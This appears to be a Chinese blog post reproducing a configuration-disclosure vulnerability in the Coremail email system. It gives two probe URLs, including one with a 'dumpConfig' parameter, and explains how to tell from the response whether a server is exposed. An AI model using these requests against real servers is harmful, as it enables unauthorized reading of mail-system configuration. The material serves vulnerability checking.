Coremail接口存配置读取漏洞POC

Coremail作为国内广泛使用的邮件系统,其产品在不同行业有着大量用户。文章介绍了如何复现Coremail接口存在的配置读取漏洞,包括通过访问`mailsms/s?func=ADMIN:appState&dumpConfig=/`和`apiws/services/`来检测漏洞是否存在,揭示了系统可能的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。

截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户  ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。

 

 

复现手法

1.mailsms

浏览器访问  http://host/mailsms/s?func=ADMIN:appState&dumpConfig=/

出现一些配置文件信息 证明存在该漏洞

出现404或者页面空白 则证明漏洞不存在

 

2.apiws

http://host/apiws/services/

http://host/./apiws/services/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值